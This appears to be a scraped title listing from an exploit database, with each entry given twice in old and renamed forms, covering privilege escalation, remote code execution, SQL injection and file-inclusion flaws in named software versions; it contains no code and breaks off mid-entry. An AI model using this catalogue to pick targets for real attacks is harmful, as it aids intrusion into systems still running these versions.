
8 new exploits McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC) McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC) Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation eTrust AntiVirus Agent r8 - Local Privilege Escalation eTrust AntiVirus Agent r8 - Privilege Escalation WICD 1.7.1 - Local Privilege Escalation WICD 1.7.1 - Privilege Escalation Novell Client 4.91 SP4 - Local Privilege Escalation Novell Client 4.91 SP4 - Privilege Escalation H-Sphere Webshell 2.4 - Privilege Escalation H-Sphere WebShell 2.4 - Privilege Escalation Zend Platform 2.2.1 - PHP.INI File Modification Zend Platform 2.2.1 - 'PHP.INI' File Modification AIX 7.1 - lquerylv Privilege Escalation AIX 7.1 - 'lquerylv' Privilege Escalation sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation Automated Logic WebCTRL 6.5 - Local Privilege Escalation Automated Logic WebCTRL 6.5 - Privilege Escalation Netdecision 5.8.2 - Local Privilege Escalation Netdecision 5.8.2 - Privilege Escalation H-Sphere Webshell 2.4 - Remote Command Execution H-Sphere WebShell 2.4 - Remote Command Execution NetIQ 
Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit) NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit) STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit) STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit) v0pCr3w Web Shell - Remote Code Execution (Metasploit) v0pCr3w (Web Shell) - Remote Code Execution (Metasploit) InstantCMS 1.6 - Remote PHP Code Execution (Metasploit) InstantCMS 1.6 - PHP Remote Code Execution (Metasploit) Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit) Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) HPE < 7.2 - Java Deserialization Tecnovision DLX Spot - SSH Backdoor phpBB 2.0.15 - (highlight) Remote PHP Code Execution phpBB 2.0.15 - 'highlight' PHP Remote Code Execution phpBB 2.0.15 - Remote PHP Code Execution (Metasploit) phpBB 2.0.15 - PHP Remote Code Execution (Metasploit) versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection VuBB Forum RC1 - (m) SQL Injection VuBB Forum RC1 - 'm' SQL Injection Wizz Forum 1.20 - (TopicID) SQL Injection PHPWebThings 1.4 - (msg/forum) SQL Injection Wizz Forum 1.20 - 'TopicID' SQL Injection PHPWebThings 1.4 - 'msg'/'forum' SQL Injection webSPELL 4.01 - (title_op) SQL Injection webSPELL 4.01 - 'title_op' SQL Injection YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1) Advanced Guestbook 2.4.0 - (phpBB) File Inclusion TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2) Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1) Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2) Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion Knowledge Base Mod 2.0.2 - (phpBB) Remote 
File Inclusion Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion Foing 0.7.0 - (phpBB) Remote File Inclusion Foing 0.7.0 - 'phpBB' Remote File Inclusion Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion XMB 1.9.6 - (u2uid) SQL Injection (mq=off) XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion TualBLOG 1.0 - (icerikno) SQL Injection TualBLOG 1.0 - 'icerikno' SQL Injection Tekman Portal 1.0 - (tr) SQL Injection Tekman Portal 1.0 - 'tr' SQL Injection MyReview 1.9.4 - (email) SQL Injection / Code Execution MyReview 1.9.4 - 'email' SQL Injection / Code Execution phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion phpBB Static Topics 1.0 - phpbb_root_path File Inclusion phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion webSPELL 4.01.01 - (getsquad) SQL Injection webSPELL 4.01.01 - 'getsquad' SQL Injection Osprey 1.0 - GetRecord.php Remote File Inclusion Osprey 1.0 - 'GetRecord.php' Remote File Inclusion Techno Dreams Announcement - (key) SQL Injection Techno Dreams Guestbook 1.0 - (key) SQL Injection Techno Dreams Announcement - 'key' SQL Injection Techno Dreams Guestbook 1.0 - 'key' SQL Injection GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion GEPI 1.4.0 - 
'gestion/savebackup.php' Remote File Inclusion PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion mxBB Module Meeting 1.1.2 - Remote FileInclusion mxBB Module Meeting 1.1.2 - Remote File Inclusion Uploader & Downloader 3.0 - (id_user) SQL Injection Uploader & Downloader 3.0 - 'id_user' SQL Injection The Classified Ad System 1.0 - (main) SQL Injection The Classified Ad System 1.0 - 'main' SQL Injection VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion XLAtunes 0.1 - (album) SQL Injection XLAtunes 0.1 - 'album' SQL Injection webSPELL 4.01.02 - (topic) SQL Injection webSPELL 4.01.02 - 'topic' SQL Injection webSPELL 4.01.02 - Remote PHP Code Execution webSPELL 4.01.02 - PHP Remote Code Execution PHP-Nuke - iFrame (iframe.php) Remote File Inclusion PHP-Nuke - 'iframe.php' Remote File Inclusion XOOPS Module Camportail 1.1 - (camid) SQL Injection XOOPS Module Camportail 1.1 - 'camid' SQL Injection Mutant 0.9.2 - mutant_functions.php Remote File Inclusion Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion Original 0.11 - config.inc.php x[1] Remote File Inclusion Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion Glossword 1.8.1 - custom_vars.php Remote File Inclusion Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion GeekLog 2.x - ImageImageMagick.php Remote File Inclusion GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion phpFFL 1.24 - 
'PHPFFL_FILE_ROOT' Remote File Inclusion phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion LiveAlbum 0.9.0 - common.php Remote File Inclusion LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion Pindorama 0.1 - client.php Remote File Inclusion Pindorama 0.1 - 'client.php' Remote File Inclusion Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion TOWeLS 0.1 - scripture.php Remote File Inclusion Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion TOWeLS 0.1 - 'scripture.php' Remote File Inclusion Sige 0.1 - sige_init.php Remote File Inclusion Sige 0.1 - 'sige_init.php' Remote File Inclusion Scribe 0.2 - Remote PHP Code Execution Scribe 0.2 - PHP Remote Code Execution patBBcode 1.0 - bbcodeSource.php Remote File Inclusion patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion Tilde CMS 4.x - (aarstal) SQL Injection Tilde CMS 4.x - 'aarstal' SQL Injection CityWriter 0.9.7 - head.php Remote File Inclusion CityWriter 0.9.7 - 'head.php' Remote File Inclusion PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion WebSihirbazi 5.1.1 - (pageid) SQL Injection WebSihirbazi 5.1.1 - 'pageid' SQL Injection Blakord Portal Beta 1.3.A - (all modules) SQL Injection Blakord Portal Beta 1.3.A - (All Modules) SQL Injection PHP Links 1.3 - smarty.php Remote File Inclusion PHP Links 1.3 - 'smarty.php' Remote File Inclusion Aterr 0.9.1 - Local File Inclusion (PHP5) Aterr 0.9.1 - PHP5 Local File Inclusion phpEmployment - (PHP upload) Arbitrary File Upload phpEmployment - 'PHP Upload' Arbitrary File Upload XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution Xplode CMS - (wrap_script) SQL Injection Xplode CMS - 'wrap_script' SQL Injection VS PANEL 7.3.6 - (Cat_ID) SQL Injection VS PANEL 7.3.6 - 'Cat_ID' SQL Injection WebMember 1.0 - (formID) SQL Injection WebMember 1.0 - 
'formID' SQL Injection Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion Kjtechforce mailman b1 - (code) SQL Injection Delete Row Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection Virtue Classifieds - (category) SQL Injection Virtue Classifieds - 'category' SQL Injection XOOPS Celepar Module Qas - (codigo) SQL Injection XOOPS Celepar Module Qas - 'codigo' SQL Injection URA 3.0 - (cat) SQL Injection URA 3.0 - 'cat' SQL Injection TYPO3 CMS 4.0 - (showUid) SQL Injection TYPO3 CMS 4.0 - 'showUid' SQL Injection Typing Pal 1.0 - (idTableProduit) SQL Injection Typing Pal 1.0 - 'idTableProduit' SQL Injection Videos Broadcast Yourself 2 - (UploadID) SQL Injection Videos Broadcast Yourself 2 - 'UploadID' SQL Injection Uiga Church Portal - (year) SQL Injection Uiga Church Portal - 'year' SQL Injection Network Management/Inventory System - header.php Remote File Inclusion Network Management/Inventory System - 'header.php' Remote File Inclusion BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit) BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit) PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection Vivid Ads Shopping Cart - (prodid) SQL Injection Vivid Ads Shopping Cart - 'prodid' SQL Injection WorldPay Script Shop - (productdetail) SQL Injection WorldPay Script Shop - 'productdetail' SQL Injection tincan ltd - (section) SQL Injection tincan ltd - 'section' SQL Injection Template Seller Pro 3.25 - (tempid) SQL Injection Template Seller Pro 3.25 - 'tempid' SQL Injection Webloader 7 < 8 - (vid) SQL Injection Webloader 7 < 8 - 'vid' SQL Injection web5000 - (page_show) SQL Injection web5000 - 'page_show' SQL Injection Cosmos Solutions CMS - (id= / page=) SQL Injection Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection iBoutique - (page) SQL Injection / Cross-Site Scripting iBoutique - 'page' 
SQL Injection / Cross-Site Scripting OpenX - (phpAdsNew) Remote File Inclusion OpenX - 'phpAdsNew' Remote File Inclusion System Shop - (Module aktka) SQL Injection System Shop - 'Module aktka' SQL Injection TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit) TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit) vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1) PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1) YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion Invision Board 1.1.1 - ipchat.php Remote File Inclusion Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion Typo3 3.5 b5 - Translations.php Remote File Inclusion Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion Webchat 0.77 - Defines.php Remote File Inclusion Webchat 0.77 - 'Defines.php' Remote File Inclusion PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection ttCMS 2.2/2.3 - header.php Remote File Inclusion ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution HolaCMS 1.2.x - HTMLtags.php Local File Inclusion HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion WebCalendar 0.9.x - Multiple Module SQL Injection WebCalendar 0.9.x - (Multiple Modules) SQL Injection PHP-Nuke 6.x - Multiple Module SQL Injection PHP-Nuke 6.x - (Multiple Modules) SQL Injection EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File 
Inclusion Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion Gemitel 3.50 - affich.php Remote File Inclusion Command Injection Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection phpBB 2.0.x - album_portal.php Remote File Inclusion phpBB 2.0.x - 'album_portal.php' Remote File Inclusion Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion @lexPHPTeam @lex Guestbook 3.12 - Remote PHP File 
Inclusion @lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion PANews 2.0 - Remote PHP Script Code Execution PANews 2.0 - PHP Remote Code Execution VoteBox 2.0 - Votebox.php Remote File Inclusion VoteBox 2.0 - 'Votebox.php' Remote File Inclusion McNews 1.x - install.php Arbitrary File Inclusion McNews 1.x - 'install.php' Arbitrary File Inclusion Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection GrayCMS 1.1 - error.php Remote File Inclusion GrayCMS 1.1 - 'error.php' Remote File Inclusion PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion MWChat 6.7 - Start_Lobby.php Remote File Inclusion MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion Comdev 
eCommerce 3.0 - config.php Remote File Inclusion Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion PHPWebNotes 2.0 - Api.php Remote File Inclusion PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion Tru-Zone Nuke ET 3.x - Search Module SQL Injection Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting CF_Nuke 4.6 - index.cfm Local File Inclusion CF_Nuke 4.6 - 'index.cfm' Local File Inclusion Tolva 0.1 - Usermods.php Remote File Inclusion Tolva 0.1 - 'Usermods.php' Remote File Inclusion SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion PHORUM 3.x/5.x - Common.php Remote File Inclusion PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion SPIP 1.8.3 - Spip_login.php Remote File Inclusion SPIP 
1.8.3 - 'Spip_login.php' Remote File Inclusion CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion Monster Top List 1.4 - functions.php Remote File Inclusion Monster Top List 1.4 - 'functions.php' Remote File Inclusion I-RATER Platinum - Common.php Remote File Inclusion I-RATER Platinum - 'Common.php' Remote File Inclusion I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion Advanced Guestbook 2.x - Addentry.php Remote File Inclusion Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion RadScripts RadLance 7.0 - popup.php Local File Inclusion RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion osTicket 1.x - Open_form.php Remote File Inclusion osTicket 1.x - 'Open_form.php' Remote File Inclusion Squirrelmail 1.4.x - Redirect.php Local File Inclusion Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion phpBB 2.0.x - template.php Remote File Inclusion phpBB 2.0.x - 'template.php' Remote File Inclusion phpBB - BBRSS.php Remote File Inclusion phpBB - 'BBRSS.php' Remote File Inclusion eNpaper1 - Root_Header.php Remote File Inclusion eNpaper1 - 'Root_Header.php' Remote File Inclusion CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion MF Piadas 1.0 - admin.php Remote File Inclusion MF Piadas 1.0 - 'admin.php' Remote File Inclusion SiteBuilder-FX - top.php Remote File Inclusion SiteBuilder-FX - 'top.php' Remote File Inclusion Blog:CMS 4.1 - Thumb.php Remote File 
Inclusion Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion Extcalendar 2.0 - Extcalendar.php Remote File Inclusion Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion RW::Download - stats.php Remote File Inclusion RW::Download - 'stats.php' Remote File Inclusion PHP Event Calendar 1.4 - calendar.php Remote File Inclusion PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion Forum 5 - pm.php Local File Inclusion Forum 5 - 'pm.php' Local File Inclusion Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion Bosdates 3.x/4.0 - Payment.php Remote File Inclusion Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion VWar 1.5 - 'stats.php' vwar_root Parameter 
Remote File Inclusion Mafia Moblog 6 - Big.php Remote File Inclusion Mafia Moblog 6 - 'Big.php' Remote File Inclusion WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion Jetbox CMS 2.1 - Search_function.php Remote File Inclusion Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion WM-News 0.5 - print.php Local File Inclusion Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion WM-News 0.5 - 'print.php' Local File Inclusion Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion Exporia 0.3 - Common.php Remote File Inclusion Exporia 0.3 - 'Common.php' Remote File Inclusion My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion Geotarget - script.php Remote File Inclusion Geotarget - 'script.php' Remote File Inclusion PHPSelect Web Development - index.php3 Remote File Inclusion PHPSelect Web Development - 'index.php3' Remote File Inclusion PHP Web Scripts Easy Banner - functions.php Remote File Inclusion PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion Tagit2b - DelTagUser.php Remote File Inclusion Softerra PHP Developer Library 1.5.3 - 
'Grid3.lib.php' Remote File Inclusion BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion Tagit2b - 'DelTagUser.php' Remote File Inclusion CommunityPortals 1.0 - bug.php Remote File Inclusion CommunityPortals 1.0 - 'bug.php' Remote File Inclusion PHP TopSites FREE 1.022b - config.php Remote File Inclusion PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion phpBB Add Name Module - Not_Mem.php Remote File Inclusion phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion RamaCMS - ADODB.Inc.php Remote File Inclusion H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion RamaCMS - 'ADODB.Inc.php' Remote File Inclusion H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion Zorum 3.5 - DBProperty.php Remote File Inclusion Zorum 3.5 - 'DBProperty.php' Remote File Inclusion PHPMyConferences 8.0.2 - Init.php Remote File Inclusion PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion NewP News Publishing System 1.0 - Class.Database.php 
